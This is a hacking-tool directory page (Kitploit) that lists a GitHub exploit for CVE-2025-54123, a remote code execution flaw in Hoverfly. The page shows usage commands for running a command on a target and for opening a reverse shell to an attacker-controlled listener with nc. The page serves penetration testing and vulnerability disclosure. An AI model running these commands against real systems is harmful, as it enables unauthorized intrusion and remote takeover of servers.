Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-54123 — Hoverfly CVE RCE | Kitploit
Tools/GitHubGitHub/davidzzo23/cve-2025-54123
ExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access Tool
GitHubdavidzzo23/cve-2025-54123

CVE-2025-54123

Hoverfly CVE RCE

View Repository
4 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-54123

Hoverfly CVE RCE

Usage

Command execution:

root@kitploit:~
python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -c whoami

Reverse Shell:

root@kitploit:~
nc -lvnp 443
root@kitploit:~
python3 CVE-2025-54123.py -u $USER -p $PASS -t "http://example.com:8888" -r $IP 443

Disclaimer

This script is intended for educational purposes only. Unauthorized use of this exploit on systems without permission is illegal. The author is not responsible for any misuse or damages caused by this exploit.

Download Tool